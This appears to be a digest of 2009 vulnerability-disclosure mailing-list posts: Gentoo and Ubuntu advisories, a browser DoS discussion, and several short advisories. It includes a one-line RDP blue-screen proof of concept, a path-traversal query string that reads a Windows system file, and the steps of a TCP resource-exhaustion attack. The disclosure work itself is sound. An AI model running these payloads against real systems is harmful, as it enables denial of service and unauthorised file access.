Krakow Labs Development 4f: The File Format Fuzzing Framework 4f is a file format fuzzing framework. 4f uses modules which are specifications of the targeted binary or text file format that tell it how to fuzz the target application. If 4f detects a crash, it will log crucial information important for allowing the 4f user to reproduce the problem and also debugging information important to deciding the severity of the bug and its exploitability. 4f uses specialized modules for fuzzing code that interprets file formats. Several modules are included and more can be written to follow other file formats. Full source code, binary, package, demonstration photo and video @ http://www.krakowlabs.com You can also check out the video that shows 4f discovering 0day (not worth much but it shows 4f works!) @ SecurityTube too --> http://www.securitytube.net/The-File-Format-Fuzzing-Framework-(4f)-video.aspx ~KL
[ GLSA 200909-04 ] Clam AntiVirus: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Clam AntiVirus: Multiple vulnerabilities Date: September 09, 2009 Bugs: #264834, #265545 ID: 200909-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple vulnerabilities in ClamAV allow for the remote execution of arbitrary code or Denial of Service. Background == Clam AntiVirus (short: ClamAV) is an anti-virus toolkit for UNIX, designed especially for e-mail scanning on mail gateways. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-antivirus/clamav < 0.95.2 >= 0.95.2 Description === Multiple vulnerabilities have been found in ClamAV: * The vendor reported a Divide-by-zero error in the PE ("Portable Executable"; Windows .exe) file handling of ClamAV (CVE-2008-6680). * Jeffrey Thomas Peckham found a flaw in libclamav/untar.c, possibly resulting in an infinite loop when processing TAR archives in clamd and clamscan (CVE-2009-1270). * Martin Olsen reported a vulnerability in the CLI_ISCONTAINED macro in libclamav/others.h, when processing UPack archives (CVE-2009-1371). * Nigel disclosed a stack-based buffer overflow in the "cli_url_canon()" function in libclamav/phishcheck.c when processing URLs (CVE-2009-1372). Impact == A remote attacker could entice a user or automated system to process a specially crafted UPack archive or a file containing a specially crafted URL, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application, or a Denial of Service. Furthermore, a remote attacker could cause a Denial of Service by supplying a specially crafted TAR archive or PE executable to a Clam AntiVirus instance. Workaround == There is no known workaround at this time. Resolution == All Clam AntiVirus users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =app-antivirus/clamav-0.95.2 References == [ 1 ] CVE-2008-6680 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-6680 [ 2 ] CVE-2009-1270 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1270 [ 3 ] CVE-2009-1371 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1371 [ 4 ] CVE-2009-1372 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1372 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-04.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature
[ GLSA 200909-03 ] Apache Portable Runtime, APR Utility Library: Execution of arbitrary code
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200909-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Apache Portable Runtime, APR Utility Library: Execution of arbitrary code Date: September 09, 2009 Bugs: #280514 ID: 200909-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Multiple integer overflows in the Apache Portable Runtime and its Utility Library might allow for the remote execution of arbitrary code. Background == The Apache Portable Runtime (aka APR) provides a set of APIs for creating platform-independent applications. The Apache Portable Runtime Utility Library (aka APR-Util) provides an interface to functionality such as XML parsing, string matching and databases connections. Affected packages = --- Package/ Vulnerable /Unaffected --- 1 dev-libs/apr< 1.3.8 >= 1.3.8 2 dev-libs/apr-util < 1.3.9 >= 1.3.9 --- 2 affected packages on all of their supported architectures. --- Description === Matt Lewis reported multiple Integer overflows in the apr_rmm_malloc(), apr_rmm_calloc(), and apr_rmm_realloc() functions in misc/apr_rmm.c of APR-Util and in memory/unix/apr_pools.c of APR, both occurring when aligning memory blocks. Impact == A remote attacker could entice a user to connect to a malicious server with software that uses the APR or act as a malicious client to a server that uses the APR (such as Subversion or Apache servers), possibly resulting in the execution of arbitrary code with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All Apache Portable Runtime users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-libs/apr-1.3.8 All APR Utility Library users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =dev-libs/apr-util-1.3.9 References == [ 1 ] CVE-2009-2412 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2412 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200909-03.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: PGP signature
Re: DoS vulnerability in Google Chrome
Hello MaXe! However, I just tested the vulnerability in chrome and the incidents were different. As I said on my system it's solely Chrome DoS vulnerability. On my system with Firefox 3.0.13 (and previous versions, when I tested them before) there is not such issue, when Firefox was DoSed via Chrome, i.e. Cross-Application DoS. Taking into account that you have this issue with Firefox 3.5.2, than it can be problem with FF 3.5.x versions, which have tight integration with Chrome's and other software's URI handlers. However I believe this can be used / triggered against any other application installed that FireFox knows exists on the target operating system. :-) It's quite possible, because I didn't check this Cross-Application DoS in Fifefox (due to that my FF 3.0.13 is not affected to this attack). If there is such hole, it can be possible to make similar attack against any other installed application which have their URI handler registered in the system. And not only Firefox (and the system) must know about it, but the attacker also must know about it :-). My idea was to made blocking DoS attack on Chrome (first exploit was blocking DoS, second was blocking DoS and DoS via resources consumption). Which I wrote about last year in my Classification of DoS vulnerabilities in browsers (http://websecurity.com.ua/2550/). In 2008 I wrote about many blocking DoS vulnerabilities in browsers, and this year I continued to write about such holes, and after this one I'd write about another one soon (which I found last year). Like these DoS vulnerabilities in Firefox, IE, Chrome and Opera (http://websecurity.com.ua/3194/). Or like DoS vulnerability in Internet Explorer 7 (http://websecurity.com.ua/2872/), which is similar to DoS vulnerabilities in Firefox, Opera and Chrome (http://websecurity.com.ua/2456/), all of them are printing DoS attacks. This will ONLY work if FireFox does NOT know which program to use. It's interesting, because as I understand from your first information that if works in Firefox (via Chrome) and from your previous text ("that FireFox knows exists on the target operating system"), it must work if Firefox does KNOW about which program to use. But in your case DoS effect is better when Firefox does not know about program, then if it does know. (I'll post it on my own website anyway, giving you credit too of course.) Thanks. I'm glad that my blocking DoS and DoS via resources consumption exploit give you inspiration to find new way to attack Firefox and IE7 ;-). Internet Explorer 7 version: 7.0.5730.13 will by the way consume up to 70% of the CPU if the same script is run. MaXe, it's resource consumption DoS, which described in my mentioned-above Classification of DoS vulnerabilities in browsers. So 70% or higher (up to 100%) CPU resources is used, it's already resource consumption DoS. As I wrote before, my IE6 isn't affected by that hole in Chrome. Does your IE7 is affected by my Chrome exploit, or only by your AIM exploit? Because if there is mentioned hole, then it must be affected by both exploits. Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua - Original Message - From: To: ; Sent: Wednesday, August 26, 2009 11:41 AM Subject: Re: DoS vulnerability in Google Chrome Hello MustLive, Thanks for your immediate reply. I have now tested what you said, cause I suspected that it was only happening because Google Chrome was installed, due to FireFox isn't able to know what ``chromehtml:´´ is on its own. (it has to be associated with an application in this case). The following would open a lot of windows, consuming most likely all ressources: http://websecurity.com.ua/uploads/2009/Google%20Chrome%20DoS%20Exploit2.html FireFox version: FireFox 3.5.2 (Mozilla/5.0 (Windows; U; Windows NT 5.1; da; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 Google Chrome versions: 4.0.202.0 && 2.0.172.43 (both tested, the first is the new beta.) Operating System: Windows XP Pro SP2 Hardware: 1.8ghz (single core) & 1GB ram. However, I just tested the vulnerability in chrome and the incidents were different. In Google Chrome it appears to perform a deadlock of the browser while on FireFox it performs a starvation "attack" by opening a huge amount of windows and thereby eventually "killing" all the ram making Windows completely useless (almost). The only thing I could do was to logout and then log back in. Task Manager was unable to help me even though it was set to "Always On Top". If the Task Manager was opened first then I might have had a chance but if it weren't then 4 out of 5 times the best option would be to logout and then re-login. I believe this is a kind of functionality bug versus denial of service bug in FireFox which unfortunately is not related to the Chrome Bug. This was tested at my work since I don't have Google chrome installed on my linux installation at home. However I believe this can be used / triggered again
SeacureIT Preview Conference 2009
We are glad to announce the first international security conference in Italy, SeacureIT Preview 2009. The conference will take place between 21st and 23rd October at Fiera Milano City, Milan's conference and trade show center, co-located with SMAU, Italy's largest ICT tradeshow. The conference will consist of two days of top notch trainings and one day of bleeding edge talks. Topics of presentations this year include but are not limited to OSX security, hardware hacking, SAP exploiting, web 2.0 threats and malware analysis. Aside from highly technical presentations we are pleased to have a roundtable and a number of talks focusing on the economic aspect of cybersecurity, brought to you by well known cybersecurity and cybercrime experts. To read the full line-up of speakers please see: http://www.seacure.it/speakers.htm The conference will be concluded by a networking event with a full typical Milanese "aperitivo". For those interested in trainings, the topics range from SAP security to Oracle hacking, from exploitation techniques to physical security. To learn more on the trainings, please visit http://www.seacure.it/training.htm SeacureIT preview (hosted in Milan, the world-renown "city of fashion") is a launch event for our main conference which will take place in 2010 in beautiful Sardinia, in the middle of the Mediterranean sea. A full description of this year's location as well as next year's can be seen at: http://www.seacure.it/venue.htm You will have the opportunity of listening to a set of excellent speakers, at a really convenient entrance fee; additionally, all the participants to the Preview edition will enjoy a 100 EUR rebate on the 2010 edition of the conference (and the trainings participants will get a full 200 EUR rebate on any training of their choice next year!). We hope to see all of you in Milan! Best regards, The SeacureIT team
Multiple RDP Connections BSOD DOS
Creating multiple RDP connection at the same time causes Windows to Blue Screen. Here is the Proof of Concept code. for /L %i in (1,1,20) do mstsc /v:127.0.0.%i It does work on Windows 7 and some Vista installations. -Tim Medin
TCP/IP Orphaned Connections Vulnerability
Hi, concerning MS09-048 and in particular CVE-2009-1926, we would like to publish the following advisory: http://www.recurity-labs.com/content/pub/Microsoft_Windows_CVE-2009-1926_MS09-048.txt regards, Fabian "fabs" Yamaguchi, Recurity Labs GmbH Recurity Labs GmbH http://www.recurity-labs.com entomol...@recurity-labs.com Date: 09.09.2009 Vendor:Microsoft Corporation Product: Microsoft Windows XP/Vista TCP/IP-Stack Vulnerability: TCP/IP Orphaned Connections Vulnerability Affected Releases: Windows Vista Business SP1/ Windows XP SP3 Severity: Moderate CVE: CVE-2009-1926 Vendor communication: 09.12.2008 Initial notification sent to MSRC 10.12.2008 Response from MSRC case manager - The report is being investigated. 23.12.2008 Recurity Labs would like to know whether MSRC considers this a vulnerability. If not so, Recurity Labs would like to mention the issue in an upcoming talk on TCP Denial Of Service vulnerabilities at the 25th Chaos Communication Congress (25C3). 28.12.2008 Recurity Labs agrees not to mention the issue until MSRC has has a chance to classify it. 09.01.2009 MSRC case manager asks for a copy of the presentation-slides. 13.01.2009 Vulnerability is classified as a 'Moderate' DoS by MSRC. 26.02.2009 Update on the issue by MSRC - A fix is scheduled for May or June. 27.03.2009 Update on the issue by MSRC - The fix is still scheduled for June. 08.05.2009 Update on the issue by MSRC - The fix is delayed to August. 29.07.2009 Meeting the MSRC case manager at BlackHat USA and getting a t-shirt. Thanks, nice move. 05.08.2009 Update on the issue by MSRC - The fix is ready but issues arose during testing. The release is rescheduled. 09.09.2009 Microsoft releases MS09-048 Overview: The TCP/IP-Stack of the Microsoft Windows XP/Vista Operating System is vulnerable to a remote resource exhaustion vulnerability. By taking advantage of this vulnerability, an attacker can cause a connection's Transmission Control Block (TCB) to remain in memory for an indefinite amount of time without the need for the attacker to further maintain the connection's activity. Description: The vulnerabilities exist in the implementation of TCP's flow-control mechanism, in particular due to incorrect handling of advertised "zero-windows". Zero-windows may be advertised by a TCP after a connection enters the "ESTABLISHED" state to indicate that it is currently not able to accept any data due to limited buffer-space. Given that pending data exists, which the peer TCP needs to deliver, the peer then starts its persist-timer, which periodically queries the value of the flow-control window by issuing so called zero-window-probes. These probes are TCP segments containing a single byte of payload, which force the receiver to generate an acknowledgment, which in turn allows the peer to receive an update on the current value of the flow-control window. As a side effect, the retransmission-timer is disabled because persist- and retransmission-timer are mutually exclusive. The sending TCP is said to be in persist-state. In Windows XP and Windows Vista, connections, which are in the state "FIN_WAIT_1" or "FIN_WAIT_2" respectively do not ever terminate if the flow-control mechanism is in "persist-state". This can be demonstrated as followed: 1. The Attacker establishes TCP-connection with the target. 2. The Attacker sends a specially crafted TCP-segment to the target. The segment must fulfill the following criteria: a) The advertised flow-control window is set to zero. b) If the layer5-application that is in possession of the socket associated with this connection does not automatically send data to the attacker, the segment needs to cause the application to do so. c) To increase the attack speed, the segment-data should cause the layer-5 application to terminate the connection as soon as possible. For example, if the layer-5 application is a web-server, a GET-Request, which references a non-existing resource, is a good choice. When targeting the NetBIOS Session Manager (port 139), simply sending an invalid request such as 'abc\n' is sufficient. 3. Since the layer-5 application closes the socket associated with the connection in response to the attacker's request, the connection moves into state "FIN_WAIT_1" a
[Advisory] ChartDirector Critical File Access
Hi, Please find the following Advisory http://www.dokfleed.net/duh/modules.php?name=News&file=article&sid=37 Regards DokFLeed Advisory No.: ISNSC-0910 = ChartDirector Critical File Access Information == Author: DokFLeed Program Affected: http://www.chartdir.com for .NET Version: 5.0.1 Severity: Critical. Type of Advisory: Mid Disclosure. Affected/Tested Versions: Random Program Description == Widely used Chart Component on Financial & Stock Trading websites Overview = The query variable "cacheId=" is not sanitized, it will can allow critical files download Proof Of Concept ?ChartDirectorChartImage=chart_WebChartViewer1&cacheId=/../../../../../../../../windows/win.ini Solution/Fix Upgrade to latest Chart Dir or apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2): http://www.advsofteng.com/netchartdir501p2.zip Vendor Status The problem you mentions affect ChartDirector for .NET. The current version of ChartDirector for .NET on our web site (Ver 5.0.2) already has this issue fixed. So this issue no longer occurs with the current version of ChartDirector for .NET. For people using earlier versions of ChartDirector, it is suggested they upgrade to the latest version. They may also apply the following patch (ChartDirector for .NET Ver 5.0.1 Patch 2): http://www.advsofteng.com/netchartdir501p2.zip Reference http://dokfleed.net/duh/modules.php?name=News&file=article&sid=48
Open Beta - New Free AV Software
All, Immunet Protect is now in the 4th round of public beta. This is free beta AV software which has been pre-tested extensively by a portion of the Bugtraq community and is now available for general download to the rest of the community. The general idea is that it allows you to build communities of people and collectively share your protections. It's uses a series of methods to convict files, primarily in the cloud. It is meant to be run in conjunction with your current AV to increase your detection rates and is compatible with Norton/AVG/Mcafee/Avira 2009 and greater. It is not yet formally tested with other products but has been reported to work alongside Eset, Gdata, Panda Cloud and MSSE. If you would like to try it in beta we welcome your participation and more importantly, your feedback. Since posting to Bugtraq initially we've gone from 60 pre-beta users to slightly over 10,000 as I write this. Many of them part of this fantastic community, thanks for the support! The download URL is: http://www.immunet.com/user/new/ Best Regards, Al Huger Immunet Corp.
[USN-828-1] PAM vulnerability
=== Ubuntu Security Notice USN-828-1 September 08, 2009 pam vulnerability https://launchpad.net/bugs/410171 === A security issue affects the following Ubuntu releases: Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.10: libpam-runtime 1.0.1-4ubuntu5.6 Ubuntu 9.04: libpam-runtime 1.0.1-9ubuntu1.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Russell Senior discovered that the system authentication module selection mechanism for PAM did not safely handle an empty selection. If an administrator had specifically removed the default list of modules or failed to chose a module when operating debconf in a very unlikely non-default configuration, PAM would allow any authentication attempt, which could lead to remote attackers gaining access to a system with arbitrary privileges. This did not affect default Ubuntu installations. Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/pam/pam_1.0.1-4ubuntu5.6.diff.gz Size/MD5: 163787 1fe83c5f51260520402bd43e33267d4f http://security.ubuntu.com/ubuntu/pool/main/p/pam/pam_1.0.1-4ubuntu5.6.dsc Size/MD5: 1632 5962a19a022e6eb7af577b88719a64c4 http://security.ubuntu.com/ubuntu/pool/main/p/pam/pam_1.0.1.orig.tar.gz Size/MD5: 1597124 bcaa5d9bf84137e0d128b2ff9b63b1d7 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-doc_1.0.1-4ubuntu5.6_all.deb Size/MD5: 292106 89104df9cea238eb924fa7fbb0f80d35 http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-runtime_1.0.1-4ubuntu5.6_all.deb Size/MD5:89482 94993aae326381ddcd4279ed9c61e357 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-cracklib_1.0.1-4ubuntu5.6_amd64.deb Size/MD5:71576 f46ffb12fc109a58b2ebe9d36fd1173e http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-modules_1.0.1-4ubuntu5.6_amd64.deb Size/MD5: 312240 ccade228ed92c9f524b088617b42ce64 http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam0g-dev_1.0.1-4ubuntu5.6_amd64.deb Size/MD5: 169324 8fce97f395a60b4ad7f821827458e7ab http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam0g_1.0.1-4ubuntu5.6_amd64.deb Size/MD5: 113888 5b6fd51cbc3f936e6e11fdb1a9131a52 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-cracklib_1.0.1-4ubuntu5.6_i386.deb Size/MD5:71552 360601c0c24308561fe7d50a9b9bc5e7 http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam-modules_1.0.1-4ubuntu5.6_i386.deb Size/MD5: 299738 020d7196d87df2cdf17c739f9e6bf0f5 http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam0g-dev_1.0.1-4ubuntu5.6_i386.deb Size/MD5: 167018 69ed60f901436960e21e0b604ae4b19b http://security.ubuntu.com/ubuntu/pool/main/p/pam/libpam0g_1.0.1-4ubuntu5.6_i386.deb Size/MD5: 32 4afeb993ed5910e108c3fc4f9ba645b5 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/p/pam/libpam-cracklib_1.0.1-4ubuntu5.6_lpia.deb Size/MD5:71470 112033e2f1f641fec967e28f3503f88e http://ports.ubuntu.com/pool/main/p/pam/libpam-modules_1.0.1-4ubuntu5.6_lpia.deb Size/MD5: 295984 c8303ffbb776fdce4e20c999150f3549 http://ports.ubuntu.com/pool/main/p/pam/libpam0g-dev_1.0.1-4ubuntu5.6_lpia.deb Size/MD5: 165548 a8502044f6c5fac5900559d0e85fc62f http://ports.ubuntu.com/pool/main/p/pam/libpam0g_1.0.1-4ubuntu5.6_lpia.deb Size/MD5: 110474 86c7473158e190237969445a51c49d30 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/p/pam/libpam-cracklib_1.0.1-4ubuntu5.6_powerpc.deb Size/MD5:72010 da7ce309e25fade724ff291120d1866d http://ports.ubuntu.com/pool/main/p/pam/libpam-modules_1.0.1-4ubuntu5.6_powerpc.deb Size/MD5: 329746 19febf8a9d5e3a62c0957dff09dfc8c8 http://ports.ubuntu.com/pool/main/p/pam/libpam0g-dev_1.0.1-4ubuntu5.6_powerpc.deb Size/MD5: 167526 40420891673085c3889ebba39b1a92b7 http://ports.ubuntu.com/pool/main/p/pam/libpam0g_1.0.1-4ubuntu5.6_powerpc.deb Size/MD5: 114658 06a1523fa01a77ec8eb2f8eec8e7b4bf sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/p/pam/libpam-cracklib_1.0.1-4ubuntu5.6_sparc.deb Size/MD5:71854 3762836827676a721f744c06067a9ed5 http://ports.ubuntu.com/pool/main/p/pam/libpam-modules_1.0.1-4ubuntu5.6_sparc.deb Size/MD5: 307930 5afecfdbe6783dead53c8163987c053e http://ports.ubuntu.com/pool/main/p/pam/